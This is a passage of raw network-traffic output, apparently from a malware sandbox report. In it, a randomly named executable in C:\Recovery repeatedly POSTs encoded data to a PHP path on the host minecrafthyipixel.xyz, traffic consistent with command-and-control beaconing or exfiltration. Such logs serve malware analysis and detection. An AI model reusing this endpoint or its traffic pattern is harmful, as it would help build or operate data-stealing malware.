                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:48.517577887 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    22192.168.2.449769104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:48.756247044 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:48.861033916 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:48.861207008 CEST2512OUTData Raw: 57 59 5e 5d 59 4a 54 5e 5c 5e 59 59 57 5e 58 53 54 51 5f 56 54 5a 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WY^]YJT^\^YYW^XSTQ_VTZS[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&15+3$;5=+?1<2;1!"P>;4<(]-$[. X
                                                                                                                                    Apr 19, 2024 13:42:49.271919012 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:49 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=35EeB7dLm4RSaOEH6kHTwNtcr95%2F1MiYU5GDR9wMuDyOn4yvOJ%2FbcNODDNbxdyEA21WNVI1K4VfVP5GXn8PLJoNWkxrN9Evah937iBdnyeeUKh%2FrtJVpfYruT7jsFLEea2IFsGNzrgk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2230e01674e-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:49.271981955 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    23192.168.2.449770104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:49.498908043 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:49.603596926 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:49.603746891 CEST2512OUTData Raw: 57 5a 5e 59 59 4a 51 58 5c 5e 59 59 57 55 58 5b 54 55 5f 58 54 59 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ^YYJQX\^YYWUX[TU_XTYSW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%_2-."84Y$'_0(6=;#'9(S&1!">Q*/]7,8/5$[. X -
                                                                                                                                    Apr 19, 2024 13:42:49.974124908 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:49 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3CHFKrKJk0l%2FCbb22eUE55ASlFOGLelhmogNzK9PitIMcFikV4LI6u3pzwIhtyY6eQn0djZDL3S67ouzn7Zb98%2BZ0m5P2LJBvejxdTFzTkruGztPwTD2sE8YsHVoC1f%2Fz3an2y7ytTk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca227bbcb07c2-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:49.974186897 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    24192.168.2.449771104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:50.203712940 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:50.308199883 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:50.308363914 CEST2512OUTData Raw: 57 5b 5e 5b 5c 46 51 5a 5c 5e 59 59 57 5f 58 5e 54 5a 5f 5a 54 5e 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W[^[\FQZ\^YYW_X^TZ_ZT^S\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%[2=>!4'00$1U)#1:0R%;672)*(?4$^9$[. X
                                                                                                                                    Apr 19, 2024 13:42:50.572441101 CEST627INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:50 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z6x%2FyMs5xNUMLIRG5YjvQNe4kS2CSkO5S4e8vZ9BO9XYwkn2pRL%2BdrlWn%2BB2dKp%2F%2FD8Eu6eHkp5nJCwhYEWvS%2BlPVBsFmtL7eNzC0oXwSpvo0P0qhDK9Qu%2Fpk3sKOwYH8UoiMFe4KnI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca22c18cdb0d6-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:50.572505951 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    25192.168.2.449772104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:50.817934990 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:50.922333002 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:50.922662973 CEST2512OUTData Raw: 52 5f 5b 5f 59 4a 54 59 5c 5e 59 59 57 5e 58 58 54 57 5f 5f 54 59 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R_[_YJTY\^YYW^XXTW__TYS]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&'-66+$03['(1T); &)<U%+S 2%*?#\.%$[. X
                                                                                                                                    Apr 19, 2024 13:42:51.285429001 CEST617INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:51 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xlJU1FAd0AUAlm9ixzh1766Hils1zoq0u0nF9m910G6IafbzCwx%2F417zyfXRNF7uB0CQjUlWic%2FBTHuB6VzuM3GEPK0Kptp3Af94OKWgCmWaAMFaaQFGic5Zcz6EzFSX9tUJRTVkyzI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca22ff91553c2-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:51.285490990 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    26192.168.2.449773104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:51.514950037 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:51.619503975 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:51.619663000 CEST2512OUTData Raw: 57 5e 5e 5f 5c 40 54 54 5c 5e 59 59 57 56 58 5a 54 55 5f 57 54 55 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W^^_\@TT\^YYWVXZTU_WTUSZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%_&.6; Z$;';!V*(?^&932>R#T2) #Z [.$[. X !
                                                                                                                                    Apr 19, 2024 13:42:52.002085924 CEST625INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:51 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O9v0CGnspHt9WL5BEspo%2BsamS3vXohQIjApMteAaTIVgN2vdoqTXMm8QZu0Ppf456E%2FrNgqkiX8VuEM%2BnUmL%2FyXFfw7wvA%2FGvyr7%2Fve3HBgUj4Qn36FZvyVb4WVj5OtcG9cFluCP0hg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2344e667bdc-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:52.002146006 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    27192.168.2.449775104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:52.067475080 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2192
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:52.172260046 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:52.172575951 CEST2192OUTData Raw: 57 58 5b 59 59 41 51 58 5c 5e 59 59 57 54 58 5c 54 51 5f 5b 54 54 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WX[YYAQX\^YYWTX\TQ_[TTS[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%>>U!(7$#<3;=T)<&$U1(.71**(7^#<;9$[. X )
                                                                                                                                    Apr 19, 2024 13:42:52.549895048 CEST768INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:52 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wr9OMIC8RY1ZCVJ5sdF2Esj7eernfuntHQ8EWVPnJI5U%2B%2FKufsvB631%2BzyVpb12IXSl7iKYB1yeSH36uEchZPddvjweeQU94IzhkLp4qZPOxneXPT557HCvEKcSNI5wJoms8YSkxyFA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca237cef0458f-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 24 17 33 26 29 00 36 04 38 05 2b 20 3a 5a 2a 19 39 17 29 2a 36 04 34 03 2b 0b 3b 04 37 05 2b 05 00 5a 24 30 2a 09 30 04 37 09 27 30 21 59 00 1a 39 5c 20 2c 03 11 3a 00 21 1c 3f 21 22 03 34 22 2c 03 3f 3e 22 0c 23 28 2f 5e 28 00 29 18 38 06 02 50 3f 38 00 06 2d 27 35 04 20 3b 2c 52 09 12 25 54 28 38 2b 07 25 20 21 54 22 31 28 11 3c 3f 32 5b 24 2b 38 12 32 1d 28 16 2e 1c 26 1c 27 2e 3e 0d 3e 5c 3c 1e 23 2c 2d 50 25 04 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98$3&)68+ :Z*9)*64+;7+Z$0*07'0!Y9\ ,:!?!"4",?>"#(/^()8P?8-'5 ;,R%T(8+% !T"1(<?2[$+82(.&'.>>\<#,-P%.^,+H0TW
                                                                                                                                    Apr 19, 2024 13:42:52.549957037 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    28192.168.2.449776104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:52.215842962 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:42:52.320451021 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:52.320739985 CEST2512OUTData Raw: 57 5a 5e 54 59 42 54 5c 5c 5e 59 59 57 52 58 5b 54 57 5f 5b 54 5c 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ^TYBT\\^YYWRX[TW_[T\SY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%&=>!8#$$;-*;#&*?%R7T6P*+87<;-5$[. X 1
                                                                                                                                    Apr 19, 2024 13:42:52.581852913 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:52 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vR7GfzYYszpXZYuNsnRjuD5GXO2q19KEdF7xET%2BjGDsL2R%2FHYhkP2fxADQMAGd%2FQCLwjqLEl3VZ3VjJyYr9QCJlMQlziApEnYc%2FtypHCsoC1LZ3mVT5ciiGtbImFs8WDTSgD2MlXpzQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca238ac0dadd8-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:52.581913948 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    29192.168.2.449777104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:52.817693949 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:42:52.922379017 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:52.922715902 CEST2512OUTData Raw: 57 5c 5b 5b 5c 40 54 5a 5c 5e 59 59 57 5e 58 5b 54 5a 5f 5f 54 5b 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\[[\@TZ\^YYW^X[TZ__T[S_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%]%. 8'&04%+2?+429+%+ "W*8",//%$[. X
                                                                                                                                    Apr 19, 2024 13:42:53.190293074 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:53 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6W8WJxcoofq%2BOKGsPPvknUltWOmfyS9wB1gaRXG6xvkPidJdqcskUMhQCZkP4KxnbaVMMbzpm9wp%2FgWLULgIJLZIjy%2BIWF3vvfKYeAbGuhtFcYlBS4KHrtDA1fAhB0IxYtNXUetrj4s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca23c7ea57bb7-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:53.190356970 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    30192.168.2.449778104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:53.420804977 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:53.525132895 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:53.525300980 CEST2512OUTData Raw: 52 59 5e 5a 5c 44 54 5f 5c 5e 59 59 57 52 58 52 54 53 5f 5e 54 58 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RY^Z\DT_\^YYWRXRTS_^TXSZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%Z&.6";;&3+^35>(&*8V%1#1)*# 8_/%$[. X 1
                                                                                                                                    Apr 19, 2024 13:42:53.784233093 CEST625INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:53 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
